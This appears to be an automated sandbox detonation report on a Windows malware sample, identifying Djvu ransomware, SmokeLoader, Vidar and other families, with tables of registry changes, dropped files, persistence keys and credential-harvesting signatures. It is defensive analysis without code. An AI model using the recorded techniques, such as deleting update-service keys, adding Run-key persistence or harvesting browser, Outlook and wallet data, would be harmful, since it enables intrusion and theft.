Analysis Overview
SHA256
e1fc354c5a9b2177a35a329058f92f08f21165c88d7566ed2f6c74d0d1eb4ace
Threat Level: Known bad
The file 4cb907abf1db2b4b0fe03ed3c65097e3.bin was found to be: Known bad.
Malicious Activity Summary
Djvu Ransomware
DcRat
Rhadamanthys
Suspicious use of NtCreateUserProcessOtherParentProcess
Vidar
Modifies security service
SmokeLoader
Detected Djvu ransomware
Amadey
Detect rhadamanthys stealer shellcode
Sets service image path in registry
Blocklisted process makes network request
Downloads MZ/PE file
Sets DLL path for service in the registry
Stops running service(s)
Checks computer location settings
Executes dropped EXE
Modifies file permissions
Reads user/profile data of web browsers
Loads dropped DLL
Accesses 2FA software files, possible credential harvesting
Accesses Microsoft Outlook accounts
Accesses Microsoft Outlook profiles
Checks installed software on the system
Adds Run key to start application
Looks up external IP address via web service
Accesses cryptocurrency files/wallets, possible credential harvesting
Suspicious use of SetThreadContext
Suspicious use of NtSetInformationThreadHideFromDebugger
Drops file in Program Files directory
Launches sc.exe
Enumerates physical storage devices
Program crash
Suspicious use of WriteProcessMemory
Delays execution with timeout.exe
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
Suspicious behavior: MapViewOfSection
Checks processor information in registry
Suspicious behavior: EnumeratesProcesses
Modifies Internet Explorer settings
Modifies registry class
Suspicious use of FindShellTrayWindow
Uses Task Scheduler COM API
Checks SCSI registry key(s)
Creates scheduled task(s)
outlook_office_path
outlook_win_path
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2023-03-28 01:33
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2023-03-28 01:33
Reported
2023-03-28 01:35
Platform
win7-20230220-en
Max time kernel
150s
Max time network
34s
Command Line
Signatures
SmokeLoader
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\761c71f8126a6f6cb6c40f60492d463a2614e63ed6434a67d6998dccdd5aad70.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\761c71f8126a6f6cb6c40f60492d463a2614e63ed6434a67d6998dccdd5aad70.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\761c71f8126a6f6cb6c40f60492d463a2614e63ed6434a67d6998dccdd5aad70.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\761c71f8126a6f6cb6c40f60492d463a2614e63ed6434a67d6998dccdd5aad70.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\761c71f8126a6f6cb6c40f60492d463a2614e63ed6434a67d6998dccdd5aad70.exe | N/A |
| N/A | N/A | N/A | N/A |
(62 identical rows recorded by the sandbox for this signature, each with no description, indicator, process or target)
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\761c71f8126a6f6cb6c40f60492d463a2614e63ed6434a67d6998dccdd5aad70.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\761c71f8126a6f6cb6c40f60492d463a2614e63ed6434a67d6998dccdd5aad70.exe
"C:\Users\Admin\AppData\Local\Temp\761c71f8126a6f6cb6c40f60492d463a2614e63ed6434a67d6998dccdd5aad70.exe"
Network
Files
memory/1308-55-0x0000000000220000-0x0000000000229000-memory.dmp
memory/1208-56-0x0000000002BB0000-0x0000000002BC6000-memory.dmp
memory/1308-57-0x0000000000400000-0x0000000002B72000-memory.dmp
memory/1208-60-0x000007FE88710000-0x000007FE8871A000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2023-03-28 01:33
Reported
2023-03-28 01:35
Platform
win10v2004-20230220-en
Max time kernel
112s
Max time network
152s
Command Line
Signatures
Amadey
DcRat
Detect rhadamanthys stealer shellcode
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detected Djvu ransomware
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
(41 identical rows recorded by the sandbox for this signature, each with no description, indicator, process or target)
Djvu Ransomware
Modifies security service
| Description | Indicator | Process | Target |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters | C:\Windows\System32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security | C:\Windows\System32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 | C:\Windows\System32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 | C:\Windows\System32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo | C:\Windows\System32\reg.exe | N/A |
Rhadamanthys
SmokeLoader
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 2708 created 3144 | N/A | C:\Users\Admin\AppData\Local\Temp\XandETC.exe | C:\Windows\Explorer.EXE |
| PID 2708 created 3144 | N/A | C:\Users\Admin\AppData\Local\Temp\XandETC.exe | C:\Windows\Explorer.EXE |
| PID 2708 created 3144 | N/A | C:\Users\Admin\AppData\Local\Temp\XandETC.exe | C:\Windows\Explorer.EXE |
| PID 2708 created 3144 | N/A | C:\Users\Admin\AppData\Local\Temp\XandETC.exe | C:\Windows\Explorer.EXE |
| PID 2708 created 3144 | N/A | C:\Users\Admin\AppData\Local\Temp\XandETC.exe | C:\Windows\Explorer.EXE |
Vidar
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Downloads MZ/PE file
Sets DLL path for service in the registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Onix32\Parameters\ServiceDll = "C:\\Program Files (x86)\\Windows Sidebar\\Shared Gadgets\\Onix32.dll" | C:\Windows\SysWOW64\rundll32.exe | N/A |
Sets service image path in registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Onix32\ImagePath = "C:\\Windows\\system32\\svchost.exe -k LocalService" | C:\Windows\SysWOW64\rundll32.exe | N/A |
Stops running service(s)
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\223.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\223.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\37CD.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\447.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\257D.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\257D.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\4AAE.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\1eec4f0b-5e84-4f61-aa75-786176840be9\build2.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\447.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Player3.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\37CD.exe | N/A |
Executes dropped EXE
Loads dropped DLL
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
Reads user/profile data of web browsers
Accesses 2FA software files, possible credential harvesting
Accesses Microsoft Outlook accounts
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts | C:\Windows\SysWOW64\rundll32.exe | N/A |
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook | C:\Windows\system32\dllhost.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Windows\system32\dllhost.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Software\Microsoft\Office\10.0\Outlook\Profiles\Outlook | C:\Windows\system32\dllhost.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Software\Microsoft\Office\11.0\Outlook\Profiles\Outlook | C:\Windows\system32\dllhost.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Software\Microsoft\Office\12.0\Outlook\Profiles\Outlook | C:\Windows\system32\dllhost.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | C:\Windows\system32\dllhost.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\SysWOW64\rundll32.exe | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\0ed36631-a8e4-4f70-b931-251fc97814c5\\447.exe\" --AutoStart" | C:\Users\Admin\AppData\Local\Temp\447.exe | N/A |
Checks installed software on the system
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\810.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\810.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\810.exe | N/A |
Suspicious use of SetThreadContext
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\icucnv40.dll | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\selection-actions2x.png | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Legal\ENU\eula.ini | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File created | C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\LICENSE.txt | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File created | C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\ADelRCP.exe | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File created | C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\1494870C-9912-C184-4CC9-B401-A53F4D8DE290.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File created | C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\Compare_R_RHP.aapp | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\1494870C-9912-C184-4CC9-B401-A53F4D8DE290.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File created | C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\turnOnNotificationInAcrobat.gif | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File created | C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\selection-actions2x.png | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\turnOnNotificationInAcrobat.gif | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File created | C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\icucnv40.dll | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File created | C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\eula.ini | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Accessibility.api | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Compare_R_RHP.aapp | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Multimedia\MPP\Flash.mpp | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\icudt40.dll | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File created | C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\download.svg | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\cryptocme.sig | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File created | C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\Onix32.dll | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File created | C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\icudt40.dll | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File created | C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\s_agreement_filetype.svg | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File created | C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\cryptocme.sig | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\LICENSE.txt | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\s_agreement_filetype.svg | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File created | C:\Program Files\Notepad\Chrome\updater.exe | C:\Users\Admin\AppData\Local\Temp\XandETC.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\download.svg | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File created | C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\Accessibility.api | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe | C:\Windows\SysWOW64\rundll32.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
Enumerates physical storage devices
Program crash
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\761c71f8126a6f6cb6c40f60492d463a2614e63ed6434a67d6998dccdd5aad70.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\761c71f8126a6f6cb6c40f60492d463a2614e63ed6434a67d6998dccdd5aad70.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\761c71f8126a6f6cb6c40f60492d463a2614e63ed6434a67d6998dccdd5aad70.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\3C23.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\3C23.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\3C23.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Update Revision | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 | C:\Windows\SysWOW64\svchost.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 | C:\Windows\SysWOW64\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Configuration Data | C:\Windows\SysWOW64\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\FeatureSet | C:\Windows\SysWOW64\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Update Revision | C:\Windows\SysWOW64\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Component Information | C:\Windows\SysWOW64\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Identifier | C:\Windows\SysWOW64\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Update Status | C:\Windows\SysWOW64\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\94026adb-efcc-455e-99b8-0d84069a3182\build2.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Previous Update Revision | C:\Windows\SysWOW64\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Configuration Data | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\SysWOW64\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Platform Specific Field 1 | C:\Windows\SysWOW64\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\7e34cc26-e0c1-4020-8848-47aca11b85ea\build2.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\7e34cc26-e0c1-4020-8848-47aca11b85ea\build2.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Previous Update Revision | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString | C:\Windows\SysWOW64\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Configuration Data | C:\Windows\SysWOW64\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Configuration Data | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Platform Specific Field 1 | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\dllhost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor | C:\Windows\SysWOW64\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\FeatureSet | C:\Windows\SysWOW64\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Status | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\1eec4f0b-5e84-4f61-aa75-786176840be9\build2.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\FeatureSet | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Status | C:\Windows\SysWOW64\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\SysWOW64\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information | C:\Windows\SysWOW64\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor | C:\Windows\SysWOW64\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\aced79f4-3d76-4c70-8dc0-eac8de58b3df\build2.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\94026adb-efcc-455e-99b8-0d84069a3182\build2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\1eec4f0b-5e84-4f61-aa75-786176840be9\build2.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\VendorIdentifier | C:\Windows\SysWOW64\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\dllhost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Previous Update Revision | C:\Windows\SysWOW64\svchost.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Previous Update Revision | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\aced79f4-3d76-4c70-8dc0-eac8de58b3df\build2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\svchost.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
